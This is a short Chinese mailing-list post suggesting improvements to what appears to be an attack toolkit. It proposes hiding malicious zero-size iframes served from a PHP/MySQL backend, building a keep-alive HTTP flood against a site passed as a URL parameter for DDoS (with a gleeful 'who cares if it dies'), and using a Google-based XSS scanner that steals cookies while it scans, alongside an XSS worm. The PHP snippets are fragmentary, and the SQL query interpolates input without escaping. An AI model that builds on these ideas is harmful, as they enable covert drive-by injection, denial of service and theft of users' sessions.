1.不知道为什么道哥没用MYSQL来存储。
HTML文件没有隐藏,可以将URLserver存在MYSQL里,
写个PHP ,server来iframe一下嘛。
EXP: echo "<iframe src='frame.php?user=$userid' width='0' height='0' border='0'
style='display: none'></iframe>";
iframe嘛就查下数据库吧$mysql_query = mysql_query("SELECT * FROM $db_table_name WHERE
add_id = '$id';");
方面的话在来个增加ID文件,往数据库里加。
这样就隐蔽了。
2.DDOS那里就别用iframe了,
来个猛的吧$msg = "HTTP/1.1 GET /\r\nHost:"+$_GET['site']+"\r\nConnection:
Keep-Alive\r\n";
管他死活哈哈,用socket报个文也行。
3.我记得在那里看过一段关于perl的XSS搜索机代码,利用google的,不行给个扩展接口也可以。
边扫描边偷COOKIES。来个XXS Worm 关注的人就更多了。
--~--~---------~--~----~------------~-------~--~----~
要向邮件组发送邮件,请发到 [email protected]
要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---
